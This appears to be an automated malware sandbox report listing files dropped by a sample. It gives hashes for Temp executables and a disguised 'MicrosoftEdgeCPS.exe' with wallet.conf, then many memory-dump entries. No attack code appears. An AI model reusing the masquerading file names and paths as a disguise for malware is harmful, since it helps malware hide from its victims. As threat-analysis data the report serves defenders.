4a1e3655a93f5e29ac7191eb3249b5b5a61b90353e78cc0bae4e81008aaff43bd9db4c2fde0c5ffcdae5e7eb87dfccffd4a1f383c78f5d40d52cbc4d61890196

Download Submit
C:\Users\Admin\AppData\Local\Temp\Dv8Gy0Af.exe
MD5
ca42e05f9d53c7ec9383307c1ea282bb

SHA1
ed0efa1b59b461dcda08121a39411bee72f6b4cb

SHA256
63a7295e66183379580db16d0d191bb261ccc9edb982980051291c8bdf6c4ade

SHA512
4a1e3655a93f5e29ac7191eb3249b5b5a61b90353e78cc0bae4e81008aaff43bd9db4c2fde0c5ffcdae5e7eb87dfccffd4a1f383c78f5d40d52cbc4d61890196

Download Submit
C:\Users\Admin\AppData\Local\Temp\Dv8Gy0Af.exe
MD5
ca42e05f9d53c7ec9383307c1ea282bb

SHA1
ed0efa1b59b461dcda08121a39411bee72f6b4cb

SHA256
63a7295e66183379580db16d0d191bb261ccc9edb982980051291c8bdf6c4ade

SHA512
4a1e3655a93f5e29ac7191eb3249b5b5a61b90353e78cc0bae4e81008aaff43bd9db4c2fde0c5ffcdae5e7eb87dfccffd4a1f383c78f5d40d52cbc4d61890196

Download Submit
C:\Users\Admin\AppData\Local\Temp\License.XenArmor
MD5
4f3bde9212e17ef18226866d6ac739b6

SHA1
732733bec8314beb81437e60876ffa75e72ae6cd

SHA256
212173a405c78d70f90e8ec0699a60ed2f4a9f3a8070de62eabd666c268fb174

SHA512
10b7cdae0b9a7b0f8e1bfc66a60675fa9b25c523864d5ae3da243f4e6e4c5194f3bd92af57ac956157442f66414bdd3393d0a1e5ba4ef0f192561e8524d4e744

Download Submit
C:\Users\Admin\AppData\Local\Temp\License.XenArmor
MD5
bf5da170f7c9a8eae88d1cb1a191ff80

SHA1
dd1b991a1b03587a5d1edc94e919a2070e325610

SHA256
e5d5110feb21939d82d962981aeaaafc4643b40a9b87cbed800ace82135d57cd

SHA512
9e32247d8556fd6efffbf7b6b9c325652d8c4b223b0fa38020879171476a49ab1f64d8897b5d8d92b79c5484fd9d5899be26ca5f664ee1f9c2acb0857084121e

Download Submit
C:\Users\Admin\AppData\Local\Temp\UFvoOnkW5oFfKmyk.exe
MD5
bcc624fbcc3f06e8b80bb2ed4b065af6

SHA1
35269eb1e79b954d89bc2850d1ac456b35711690

SHA256
2bc84dddbfa1ae9bb8cdcd46bfec4189bf392a58eedfca71e274adf5e5a7ddbe

SHA512
f4b6dfd18b7e7bc3e43af65bd431167c3d7ef3383a55a70ba87d25c6a591593a431fc41b6b69f6cf74ba44b8f1b5008252234d2727dda7af8b102761414b9781

Download Submit
C:\Users\Admin\AppData\Local\Temp\UFvoOnkW5oFfKmyk.exe
MD5
bcc624fbcc3f06e8b80bb2ed4b065af6

SHA1
35269eb1e79b954d89bc2850d1ac456b35711690

SHA256
2bc84dddbfa1ae9bb8cdcd46bfec4189bf392a58eedfca71e274adf5e5a7ddbe

SHA512
f4b6dfd18b7e7bc3e43af65bd431167c3d7ef3383a55a70ba87d25c6a591593a431fc41b6b69f6cf74ba44b8f1b5008252234d2727dda7af8b102761414b9781

Download Submit
C:\Users\Admin\AppData\Local\Temp\Unknown.dll
MD5
86114faba7e1ec4a667d2bcb2e23f024

SHA1
670df6e1ba1dc6bece046e8b2e573dd36748245e

SHA256
568da887725ccfdc4c5aae3ff66792fe60eca4e0818338f6a8434be66a6fe46d

SHA512
d26ee0da6ccd4022982cf848c46e40f6781b667e39d0c5daf5ea8d74c44e55c55a5f7590a4d2a60aa1911358ca783c4276a9b4e6311c4cea20df1ebd4f7f457f

Download Submit
C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Local\Temp\unk.xml
MD5
77e6621fd939338d3f19f3dd948ecf43

SHA1
53df8b3a76c5d6c35a99aa7759ff3bd7ec46588c

SHA256
9cb90c1d5c31396519b1f6c73899c062b6ccbd9a8cfc7c0bb054fe88c7825867

SHA512
6e812be4c3b958f0497f91e0eb2e8b77d4a13e2b7af750a30ec9bff3dde09a233b5510ee6333a9ab3182c11ab6c3d38789921d517449c6a03164e216cee43c4f

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\id.conf
MD5
f19bdcbc1a6d4c0b122d652870ed1155

SHA1
a8726e6942dc5821afd9399170b9e3dbbeec46c9

SHA256
a03c9f063d1ddfbf4a657d055e45224b758dcb171bd2a10a7e67598a15026a07

SHA512
91174413685307813aa4daa012d73bb0339609f79e42866e4fb9c64e7de5d8d83b33dc30779ff86e75c85a186502e440eb2e41375f6f6c36cfaa3cda54674fd2

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\wallet.conf
MD5
69bf7238c8e32793411515d8ca5926a9

SHA1
d6918bcceab927a036b760a82cadd340d83b8ed1

SHA256
57df56c1be46da0057f1afe0147ac7a700fa4df393bf0b31cabd158939d1cb66

SHA512
4a3f787a09c553dd6012d0529644d9b0e7ac672be032eead2d7f9db9a64ce46f315ae01771f893d35160cc597e7df2fab2b600f6b3ff5e97ca8df403699299f3

Download Submit
\Users\Admin\AppData\Local\Temp\Unknown.dll
MD5
86114faba7e1ec4a667d2bcb2e23f024

SHA1
670df6e1ba1dc6bece046e8b2e573dd36748245e

SHA256
568da887725ccfdc4c5aae3ff66792fe60eca4e0818338f6a8434be66a6fe46d

SHA512
d26ee0da6ccd4022982cf848c46e40f6781b667e39d0c5daf5ea8d74c44e55c55a5f7590a4d2a60aa1911358ca783c4276a9b4e6311c4cea20df1ebd4f7f457f

Download Submit
memory/416-256-0x0000000004D30000-0x000000000522E000-memory.dmp

Filesize
5.0MB

Download
memory/416-255-0x0000000004D30000-0x000000000522E000-memory.dmp

Filesize
5.0MB

Download
memory/416-252-0x0000000000000000-mapping.dmp

Download
memory/492-198-0x00000000093B0000-0x00000000093E3000-memory.dmp

Filesize
204KB

Download
memory/492-213-0x00000000098E0000-0x00000000098E1000-memory.dmp

Filesize
4KB

Download
memory/492-209-0x000000007EE10000-0x000000007EE11000-memory.dmp

Filesize
4KB

Download
memory/492-158-0x0000000004B70000-0x0000000004B71000-memory.dmp

Filesize
4KB

Download
memory/492-160-0x0000000004B72000-0x0000000004B73000-memory.dmp

Filesize
4KB

Download
memory/492-211-0x00000000094F0000-0x00000000094F1000-memory.dmp

Filesize
4KB

Download
memory/492-174-0x0000000007D20000-0x0000000007D21000-memory.dmp

Filesize
4KB

Download
memory/492-215-0x0000000004B73000-0x0000000004B74000-memory.dmp

Filesize
4KB

Download
memory/492-149-0x0000000000000000-mapping.dmp

Download
memory/492-165-0x0000000007570000-0x0000000007571000-memory.dmp

Filesize
4KB

Download
memory/492-167-0x0000000007E60000-0x0000000007E61000-memory.dmp

Filesize
4KB

Download
memory/492-169-0x0000000007C80000-0x0000000007C81000-memory.dmp

Filesize
4KB

Download
memory/492-171-0x0000000007F10000-0x0000000007F11000-memory.dmp

Filesize
4KB

Download
memory/492-205-0x00000000086E0000-0x00000000086E1000-memory.dmp

Filesize
4KB

Download
memory/580-162-0x0000000000000000-mapping.dmp

Download
memory/580-220-0x0000000000401074-mapping.dmp

Download
memory/580-222-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/640-216-0x00000000004466F4-mapping.dmp

Download
memory/640-182-0x0000000000000000-mapping.dmp

Download
memory/640-218-0x0000000000400000-0x000000000047C000-memory.dmp

Filesize
496KB

Download
memory/688-195-0x0000000000000000-mapping.dmp

Download
memory/740-126-0x00000000011C0000-0x0000000001225000-memory.dmp

Filesize
404KB

Download
memory/740-114-0x00000000008E0000-0x00000000008E1000-memory.dmp

Filesize
4KB

Download
memory/740-116-0x00000000058D0000-0x00000000058D1000-memory.dmp

Filesize
4KB

Download
memory/740-117-0x0000000005320000-0x0000000005321000-memory.dmp

Filesize
4KB

Download
memory/740-118-0x0000000002E30000-0x0000000002EC2000-memory.dmp

Filesize
584KB

Download
memory/740-119-0x0000000002EA0000-0x0000000002EA1000-memory.dmp

Filesize
4KB

Download
memory/740-120-0x0000000002E30000-0x0000000002EC2000-memory.dmp

Filesize
584KB

Download
memory/740-121-0x0000000008930000-0x0000000008AD4000-memory.dmp

Filesize
1.6MB

Download
memory/904-145-0x0000000000000000-mapping.dmp

Download
memory/1164-250-0x0000000000000000-mapping.dmp

Download
memory/1216-251-0x0000000000000000-mapping.dmp

Download
memory/1272-238-0x0000000000401108-mapping.dmp

Download
memory/1272-241-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/1284-246-0x0000000000000000-mapping.dmp

Download
memory/1512-249-0x0000000000000000-mapping.dmp

Download
memory/2216-134-0x00000000008D9FE0-mapping.dmp

Download
memory/2216-137-0x0000000000400000-0x00000000008DC000-memory.dmp

Filesize
4.9MB

Download
memory/2216-133-0x0000000000400000-0x00000000008DC000-memory.dmp

Filesize
4.9MB

Download
memory/2232-173-0x0000000000000000-mapping.dmp

Download
memory/2308-234-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/2308-232-0x0000000000401000-mapping.dmp

Download
memory/2360-247-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/2360-242-0x0000000000401000-mapping.dmp

Download
memory/2516-228-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2516-226-0x0000000000413E10-mapping.dmp

Download
memory/2532-212-0x0000000000000000-mapping.dmp

Download
memory/2532-181-0x0000000000000000-mapping.dmp

Download
memory/2820-248-0x0000000000000000-mapping.dmp

Download
memory/2864-187-0x0000000000000000-mapping.dmp

Download
memory/2948-245-0x0000000000000000-mapping.dmp

Download
memory/3036-176-0x0000000007DC0000-0x0000000007DC1000-memory.dmp

Filesize
4KB

Download
memory/3036-156-0x0000000006E60000-0x0000000006E61000-memory.dmp

Filesize
4KB

Download
memory/3036-197-0x0000000008AF0000-0x0000000008AF1000-memory.dmp

Filesize
4KB

Download
memory/3036-192-0x0000000009540000-0x0000000009541000-memory.dmp

Filesize
4KB

Download
memory/3036-179-0x0000000007E90000-0x0000000007E91000-memory.dmp

Filesize
4KB

Download
memory/3036-148-0x0000000000000000-mapping.dmp

Download
memory/3036-155-0x00000000042D0000-0x00000000042D1000-memory.dmp

Filesize
4KB

Download
memory/3036-161-0x0000000006822000-0x0000000006823000-memory.dmp

Filesize
4KB

Download
memory/3036-159-0x0000000006820000-0x0000000006821000-memory.dmp

Filesize
4KB

Download
memory/3036-223-0x0000000006823000-0x0000000006824000-memory.dmp

Filesize
4KB

Download
memory/3128-139-0x00000000006FC1D0-mapping.dmp

Download
memory/3128-144-0x0000000000400000-0x00000000006FE000-memory.dmp

Filesize
3.0MB

Download
memory/3128-138-0x0000000000400000-0x00000000006FE000-memory.dmp

Filesize
3.0MB

Download
memory/3140-129-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/3140-127-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/3140-128-0x00000000007E2730-mapping.dmp

Download
memory/3856-240-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3856-235-0x00000000004010B8-mapping.dmp

Download
memory/3980-130-0x0000000000000000-mapping.dmp

Download
memory/4024-229-0x000000000044412E-mapping.dmp

Download
memory/4024-231-0x0000000000400000-0x0000000000455000-memory.dmp

Filesize
340KB

Download